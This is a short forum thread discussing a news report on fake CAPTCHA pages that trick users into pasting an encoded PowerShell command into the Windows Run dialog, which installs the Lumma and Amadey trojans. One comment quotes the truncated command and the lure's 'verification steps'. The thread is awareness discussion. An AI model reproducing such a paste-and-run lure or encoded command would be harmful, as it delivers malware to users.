Malicious CAPTCHA delivers Lumma and Amadey Trojans. (securelist.com)
from Dot@feddit.org to technology@lemmy.world on 29 Oct 2024 10:44
https://feddit.org/post/4223905

#technology

threaded - newest

Telorand@reddthat.com on 29 Oct 2024 11:28 collapse

The Trojans are distributed through CAPTCHAs with instructions. Clicking the “I’m not a robot” button [for example] copies the line powershell.exe -eC bQBzAGgAdABhA<…>MAIgA= to the clipboard and displays so-called “verification steps”:

  • Press Win + R (this opens the Run dialog box);
  • Press CTRL + V (this pastes the line from the clipboard into the text field);
  • Press Enter (this executes the code).

Malicious use of the system clipboard seems to be the popular choice, these days. If you fall for this, maybe the internet isn’t the place for you, just yet.

ug01x@lemmy.world on 29 Oct 2024 14:05 next collapse

This really is the computer virus equivalent of those scammer calls where the only way for someone to avoid jail time, or something else bad, is for you to go and buy hundreds of dollars worth of gift cards and send the codes.

Telorand@reddthat.com on 29 Oct 2024 15:40 collapse

My BiL actually fell for one of those. He’s profoundly naive, and it’s probably good that he’s in the military, since they make many of life’s choices for him.

Ganbat@lemmy.dbzer0.com on 30 Oct 2024 08:07 collapse

Wait, is that the actual like it copies? Does powershell just straight up parse base64?